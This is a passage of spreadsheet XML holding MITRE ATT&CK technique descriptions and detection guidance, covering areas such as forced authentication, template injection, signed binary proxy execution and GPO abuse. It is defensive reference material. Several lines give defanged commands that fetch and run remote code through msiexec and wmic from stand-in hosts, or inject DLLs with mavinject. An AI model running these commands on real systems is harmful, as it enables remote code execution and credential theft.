Adversaries may take advantage of this behavior to gain access to user account hashes through forced SMB authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)),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 (Citation: GitHub Hashjacking) With access to the credential hash, an adversary can perform off-line [Brute Force](https://attack.mitre.org/techniques/T1110) cracking to gain access to plaintext credentials. (Citation: Cylance Redirect to SMB)
There are several different ways this can occur. (Citation: Osanda Stealing NetNTLM Hashes) Some specifics from in-the-wild use include:
* A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)). The document can include, for example, a request similar to &lt;code&gt;file[:]//[remote address]/Normal.dotm&lt;/code&gt; to trigger the SMB request. (Citation: US-CERT APT Energy Oct 2017)
* A modified .LNK or .SCF file with the icon filename pointing to an external reference such as &lt;code&gt;\\[remote address]\pic.png&lt;/code&gt; that will force the system to load the resource when the icon is rendered to repeatedly gather credentials. (Citation: US-CERT APT Energy Oct 2017)</t>
  </si>
  <si>
    <t>Windows,Linux,macOS,SaaS</t>
  </si>
  <si>
    <t>A drive-by compromise is when an adversary gains access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring application access tokens.
Multiple ways of delivering exploit code to a browser exist, including:
* A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting.
* Malicious ads are paid for and served through legitimate ad providers.
* Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).
Often the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted attack is referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring. (Citation: Shadowserver Strategic Web Compromise)
Typical drive-by compromise process:
1. A user visits a website that is used to host the adversary controlled content.
2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. 
    * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.
3. Upon finding a vulnerable version, exploit code is delivered to the browser.
4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place.
    * In some cases a second visit to the website after the initial scan is required before exploit code is delivered.
Unlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.
Adversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.(Citation: Volexity OceanLotus Nov 2017)</t>
  </si>
  <si>
    <t>Azure activity logs,AWS CloudTrail logs,Stackdriver logs,Packet capture,Web logs,Web application firewall logs,Application logs</t>
  </si>
  <si>
    <t>The use of software, data, or commands to take advantage of a weakness in an Internet-facing computer system or program in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL)(Citation: NVD CVE-2016-6662), standard services (like SMB(Citation: CIS Multiple SMB Vulnerabilities) or SSH), and any other applications with Internet accessible open sockets, such as web servers and related services.(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may include [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211).
If an application is hosted on cloud-based infrastructure, then exploiting it may lead to compromise of the underlying instance. This can allow an adversary a path to access the cloud APIs or to take advantage of weak identity and access management policies.
For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)</t>
  </si>
  <si>
    <t>Windows,macOS,Linux,Office 365,SaaS</t>
  </si>
  <si>
    <t>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 
All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web bugs/web beacons). Links may also direct users to malicious applications  designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, in order to gain access to protected applications and information.(Citation: Trend Micro Pawn Storm OAuth 2017)</t>
  </si>
  <si>
    <t>Supply chain compromise is the manipulation of products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. 
Supply chain compromise can take place at any stage of the supply chain including:
* Manipulation of development tools
* Manipulation of a development environment
* Manipulation of source code repositories (public or private)
* Manipulation of source code in open-source dependencies
* Manipulation of software update/distribution mechanisms
* Compromised/infected system images (multiple cases of removable media infected at the factory) (Citation: IBM Storwize) (Citation: Schneider Electric USB Malware) 
* Replacement of legitimate software with modified versions
* Sales of modified/counterfeit products to legitimate distributors
* Shipment interdiction
While supply chain compromise can impact any component of hardware or software, attackers looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels. (Citation: Avast CCleaner3 2018) (Citation: Microsoft Dofoil 2018) (Citation: Command Five SK 2011) Targeting may be specific to a desired victim set (Citation: Symantec Elderwood Sept 2012) or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. (Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011) Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency. (Citation: Trendmicro NPM Compromise)</t>
  </si>
  <si>
    <t>Application whitelisting,Process whitelisting</t>
  </si>
  <si>
    <t>Firewall,Host forensic analysis</t>
  </si>
  <si>
    <t>Application whitelisting,Autoruns Analysis,Digital Certificate Validation,Process whitelisting,User Mode Signature Validation</t>
  </si>
  <si>
    <t>Azure activity logs,Stackdriver logs,AWS CloudTrail logs,Application logs,Authentication logs,Third-party application logs</t>
  </si>
  <si>
    <t>Linux,Windows,macOS,AWS,GCP,Azure,SaaS</t>
  </si>
  <si>
    <t>Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship exploits an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.
Organizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments.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Accounts](https://attack.mitre.org/techniques/T1078) used by the other party for access to internal network systems may be compromised and used.</t>
  </si>
  <si>
    <t>Adversaries may introduce computer accessories, computers, or networking hardware into a system or network that can be used as a vector to gain access. While public references of usage by APT groups are scarce, many penetration testers leverage hardware additions for initial access. Commercial and open source products are leveraged with capabilities such as passive network tapping (Citation: Ossmann Star Feb 2011), man-in-the middle encryption breaking (Citation: Aleks Weapons Nov 2015), keystroke injection (Citation: Hak5 RubberDuck Dec 2016), kernel memory reading via DMA (Citation: Frisk DMA August 2016), adding new wireless access to an existing network (Citation: McMillan Pwn March 2012), and others.</t>
  </si>
  <si>
    <t>Monitor and analyze logs from host-based detection mechanisms, such as Sysmon, for events such as process creations that include or are resulting from parameters associated with invoking programs/commands/files and/or spawning child processes/network connections. (Citation: RSA Forfiles Aug 2017)</t>
  </si>
  <si>
    <t>Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command-Line Interface](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)
Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.</t>
  </si>
  <si>
    <t>Static File Analysis,Application whitelisting,Process whitelisting,Whitelisting by file name or path</t>
  </si>
  <si>
    <t>Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.
Anti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) and [Scripting](https://attack.mitre.org/techniques/T1064).</t>
  </si>
  <si>
    <t>An adversary may rely upon specific actions by a user in order to gain execution. This may be direct code execution, such as when a user opens a malicious executable delivered via [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) with the icon and apparent extension of a document file. It also may lead to other execution techniques, such as when a user clicks on a link delivered via [Spearphishing Link](https://attack.mitre.org/techniques/T1192) that leads to exploitation of a browser or application vulnerability via [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl. 
As an example, an adversary may weaponize Windows Shortcut Files (.lnk) to bait a user into clicking to execute the malicious payload.(Citation: Proofpoint TA505 June 2018) A malicious .lnk file may contain [PowerShell](https://attack.mitre.org/techniques/T1086) commands. Payloads may be included into the .lnk file itself, or be downloaded from a remote server.(Citation: FireEye APT29 Nov 2018)(Citation: PWC Cloud Hopper Technical Annex April 2017) 
While User Execution frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it.</t>
  </si>
  <si>
    <t>Packet capture,Netflow/Enclave netflow</t>
  </si>
  <si>
    <t>Defensive network service scanning</t>
  </si>
  <si>
    <t>Log analysis</t>
  </si>
  <si>
    <t>Anti-virus,System access controls</t>
  </si>
  <si>
    <t>Azure activity logs,AWS CloudTrail logs,Stackdriver logs,OAuth audit logs,Application logs,Authentication logs,Data loss prevention,Third-party application logs</t>
  </si>
  <si>
    <t>Linux,Windows,macOS,SaaS,AWS,GCP,Azure</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</si>
  <si>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
Adversaries may also collect information from shared storage repositories hosted on cloud infrastructure or in software-as-a-service (SaaS) applications, as storage is one of the more fundamental requirements for cloud services and systems.
The following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:
* Policies, procedures, and standards
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
* Testing / development credentials
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
Specific common information repositories include:
### Microsoft SharePoint
Found in many enterprise networks and often used to store and share significant amounts of documentation.
### Atlassian Confluence
Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation.</t>
  </si>
  <si>
    <t>Monitor processes and command-line parameters for signed binaries that may be used to proxy execution of malicious files. Legitimate programs used in suspicious ways, like msiexec.exe downloading an MSI file from the internet, may be indicative of an intrusion. Correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.</t>
  </si>
  <si>
    <t>Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application whitelisting and signature validation on systems. This technique accounts for proxy execution methods that are not already accounted for within the existing techniques.
### Msiexec.exe
Msiexec.exe is the command-line Windows utility for the Windows Installer. Adversaries may use msiexec.exe to launch malicious MSI files for code execution. An adversary may use it to launch local or network accessible MSI files.(Citation: LOLBAS Msiexec)(Citation: Rancor Unit42 June 2018)(Citation: TrendMicro Msiexec Feb 2018) Msiexec.exe may also be used to execute DLLs.(Citation: LOLBAS Msiexec)
* &lt;code&gt;msiexec.exe /q /i "C:\path\to\file.msi"&lt;/code&gt;
* &lt;code&gt;msiexec.exe /q /i http[:]//site[.]com/file.msi&lt;/code&gt;
* &lt;code&gt;msiexec.exe /y "C:\path\to\file.dll"&lt;/code&gt;
### Mavinject.exe
Mavinject.exe is a Windows utility that allows for code execution. Mavinject can be used to input a DLL into a running process. (Citation: Twitter gN3mes1s Status Update MavInject32)
* &lt;code&gt;"C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe" &amp;lt;PID&amp;gt; /INJECTRUNNING &amp;lt;PATH DLL&amp;gt;&lt;/code&gt;
* &lt;code&gt;C:\Windows\system32\mavinject.exe &amp;lt;PID&amp;gt; /INJECTRUNNING &amp;lt;PATH DLL&amp;gt;&lt;/code&gt;
### SyncAppvPublishingServer.exe
SyncAppvPublishingServer.exe can be used to run PowerShell scripts without executing powershell.exe. (Citation: Twitter monoxgas Status Update SyncAppvPublishingServer)
### Odbcconf.exe
Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) The utility can be misused to execute functionality equivalent to [Regsvr32](https://attack.mitre.org/techniques/T1117) with the REGSVR option to execute a DLL.(Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017)
* &lt;code&gt;odbcconf.exe /S /A &amp;lbrace;REGSVR "C:\Users\Public\file.dll"&amp;rbrace;&lt;/code&gt;
Several other binaries exist that may be used to perform similar behavior. (Citation: GitHub Ultimate AppLocker Bypass List)</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. Compare recent invocations of these utilities with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity (ex: URL command line arguments, creation of external network connections, loading of DLLs associated with scripting). (Citation: LOLBAS Wmic) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded.
The presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.</t>
  </si>
  <si>
    <t>Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)
Adversaries may abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses. Similar to [Trusted Developer Utilities](https://attack.mitre.org/techniques/T1127), the Microsoft common line transformation utility binary (msxsl.exe) (Citation: Microsoft msxsl.exe) can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. (Citation: Penetration Testing Lab MSXSL July 2017) Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. (Citation: Reaqta MSXSL Spearphishing MAR 2018) Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.(Citation: XSL Bypass Mar 2019)
Command-line examples:(Citation: Penetration Testing Lab MSXSL July 2017)(Citation: XSL Bypass Mar 2019)
* &lt;code&gt;msxsl.exe customers[.]xml script[.]xsl&lt;/code&gt;
* &lt;code&gt;msxsl.exe script[.]xsl script[.]xsl&lt;/code&gt;
* &lt;code&gt;msxsl.exe script[.]jpeg script[.]jpeg&lt;/code&gt;
Another variation of this technique, dubbed “Squiblytwo”, involves using [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to invoke JScript or VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can also execute local/remote scripts and, similar to its [Regsvr32](https://attack.mitre.org/techniques/T1117)/ "Squiblydoo" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) provided they utilize the /FORMAT switch.(Citation: XSL Bypass Mar 2019)
Command-line examples:(Citation: XSL Bypass Mar 2019)(Citation: LOLBAS Wmic)
* Local File: &lt;code&gt;wmic process list /FORMAT:evil[.]xsl&lt;/code&gt;
* Remote File: &lt;code&gt;wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”&lt;/code&gt;</t>
  </si>
  <si>
    <t>Microsoft’s Open Office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 (Citation: Microsoft Open XML July 2017)
Properties within parts may reference shared public resources accessed via online URLs. For example, template properties reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.
Adversaries may abuse this technology to initially conceal malicious code to be executed via documents (i.e. [Scripting](https://attack.mitre.org/techniques/T1064)). Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded. (Citation: SANS Brian Wiltse Template Injection) These documents can be delivered via other techniques such as [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) and/or [Taint Shared Content](https://attack.mitre.org/techniques/T1080) and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched. (Citation: Redxorblue Remote Template Injection) Examples have been seen in the wild where template injection was used to load malicious code containing an exploit. (Citation: MalwareBytes Template Injection OCT 2017)
This technique may also enable [Forced Authentication](https://attack.mitre.org/techniques/T1187) by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt. (Citation: Anomali Template Injection MAR 2018) (Citation: Talos Template Injection July 2017) (Citation: ryhanson phishery SEPT 2016)</t>
  </si>
  <si>
    <t>Static File Analysis</t>
  </si>
  <si>
    <t>File and Directory Permissions Modification</t>
  </si>
  <si>
    <t>Monitor and investigate attempts to modify DACLs and file/directory ownership, such as use of icacls (Citation: Microsoft icacls OCT 2017), takeown (Citation: Microsoft takeown OCT 2017), attrib (Citation: Microsoft attrib OCT 2017), and [PowerShell](https://attack.mitre.org/techniques/T1086) Set-Acl (Citation: Microsoft SetAcl) in Windows and chmod (Citation: Linux chmod)/chown (Citation: Linux chown) in macOS/Linux. Many of these are built-in system utilities and may generate high false positive alerts, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.
Consider enabling file/directory permission change auditing on folders containing key binary/configuration files. Windows Security Log events (Event ID 4670) are used when DACLs are modified. (Citation: EventTracker File Permissions Feb 2014)</t>
  </si>
  <si>
    <t>File and directory permissions are commonly managed by discretionary access control lists (DACLs) specified by the file or directory owner. File and directory DACL implementations may vary by platform, but generally explicitly designate which users/groups can perform which actions (ex: read, write, execute, etc.). (Citation: Microsoft DACL May 2018) (Citation: Microsoft File Rights May 2018) (Citation: Unix File Permissions)
Adversaries may modify file or directory permissions/attributes to evade intended DACLs. (Citation: Hybrid Analysis Icacls1 June 2018) (Citation: Hybrid Analysis Icacls2 May 2018) Modifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions such as Administrator/root depending on the file or directory's existing permissions to enable malicious activity such as modifying, replacing, or deleting specific files/directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1015), [Logon Scripts](https://attack.mitre.org/techniques/T1037), or tainting/hijacking other instrumental binary/configuration files.</t>
  </si>
  <si>
    <t>File system access controls</t>
  </si>
  <si>
    <t>T1480</t>
  </si>
  <si>
    <t>Execution Guardrails</t>
  </si>
  <si>
    <t>Detecting the action of environmental keying may be difficult depending on the implementation. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007), especially in a short period of time, may aid in detection.</t>
  </si>
  <si>
    <t>Execution guardrails constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. 
Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.
Environmental keying is one type of guardrail that includes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents) Values can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.(Citation: Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware) By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.(Citation: Kaspersky Gauss Whitepaper)(Citation: Ebowla: Genetic Malware) These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).
Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use guardrails and environmental keying to help protect their TTPs and evade detection. For example, environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) In general, guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) where a decision can be made not to further engage because the value conditions specified by the adversary are meant to be target specific and not such that they could occur in any environment.</t>
  </si>
  <si>
    <t>Anti-virus,Host forensic analysis,Signature-based detection,Static File Analysis</t>
  </si>
  <si>
    <t>T1482</t>
  </si>
  <si>
    <t>Domain Trust Discovery</t>
  </si>
  <si>
    <t>PowerShell logs,API monitoring,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t xml:space="preserve">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such as &lt;code&gt;nltest /domain_trusts&lt;/code&gt;. Remote access tools with built-in features may interact directly with the Windows API to gather information. Look for the DSEnumerateDomainTrusts() Win32 API call to spot activity associated with [Domain Trust Discovery](https://attack.mitre.org/techniques/T1482).(Citation: Harmj0y Domain Trusts) Information may also be acquired through Windows system management tools such as [PowerShell](https://attack.mitre.org/techniques/T1086). The .NET method GetAllTrustRelationships() can be an indicator of [Domain Trust Discovery](https://attack.mitre.org/techniques/T1482).(Citation: Microsoft GetAllTrustRelationships)
</t>
  </si>
  <si>
    <t>Adversaries may attempt to gather information on domain trust relationships that may be used to identify [Lateral Movement](https://attack.mitre.org/tactics/TA0008) opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.(Citation: Microsoft Trusts) Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct [SID-History Injection](https://attack.mitre.org/techniques/T1178), [Pass the Ticket](https://attack.mitre.org/techniques/T1097), and [Kerberoasting](https://attack.mitre.org/techniques/T1208).(Citation: AdSecurity Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain trusts can be enumerated using the DSEnumerateDomainTrusts() Win32 API call, .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)</t>
  </si>
  <si>
    <t>T1483</t>
  </si>
  <si>
    <t>Domain Generation Algorithms</t>
  </si>
  <si>
    <t>Process use of network,Packet capture,Network device logs,Netflow/Enclave netflow,DNS records</t>
  </si>
  <si>
    <t>Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain or related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Endgame Predicting DGA)</t>
  </si>
  <si>
    <t>Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)</t>
  </si>
  <si>
    <t>T1484</t>
  </si>
  <si>
    <t>Group Policy Modification</t>
  </si>
  <si>
    <t xml:space="preserve">It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
* Event ID 5136 - A directory service object was modified
* Event ID 5137 - A directory service object was created
* Event ID 5138 - A directory service object was undeleted
* Event ID 5139 - A directory service object was moved
* Event ID 5141 - A directory service object was deleted
GPO abuse will often be accompanied by some other behavior such as [Scheduled Task](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704). </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. 
Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predicable network path &lt;code&gt;\\&amp;lt;DOMAIN&amp;gt;\SYSVOL\&amp;lt;DOMAIN&amp;gt;\Policies\&lt;/code&gt;.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) 
Like other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain.
Malicious GPO modifications can be used to implement [Scheduled Task](https://attack.mitre.org/techniques/T1053), [Disabling Security Tools](https://attack.mitre.org/techniques/T1089), [Remote File Copy](https://attack.mitre.org/techniques/T1105), [Create Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1035) and more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandiant M Trends 2016)(Citation: Microsoft Hacking Team Breach) Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.(Citation: Wald0 Guide to GPOs) Publicly available scripts such as &lt;code&gt;New-GPOImmediateTask&lt;/code&gt; can be leveraged to automate the creation of a malicious [Scheduled Task](https://attack.mitre.org/techniques/T1053) by modifying GPO settings, in this case modifying &lt;code&gt;&amp;lt;GPO_PATH&amp;gt;\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml&lt;/code&gt;.(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in &lt;code&gt;&amp;lt;GPO_PATH&amp;gt;\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf&lt;/code&gt;, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right)
</t>
  </si>
  <si>
    <t>System access controls,File system access controls</t>
  </si>
  <si>
    <t>T1485</t>
  </si>
  <si>
    <t>Data Destruction</t>
  </si>
  <si>
    <t>File monitoring,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and command-line parameters of binaries that could be involved in data destruction activity, such as [SDelete](https://attack.mitre.org/software/S0195). Monitor for the creation of suspicious files as well as high unusual file modification activity. In particular, look for large quantities of file modifications in user directories and under &lt;code&gt;C:\Windows\System32\&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as &lt;code&gt;del&lt;/code&gt; and &lt;code&gt;rm&lt;/code&gt; often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1488) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1487) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.
Adversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable.(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) In some cases politically oriented image files have been used to overwrite data.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)
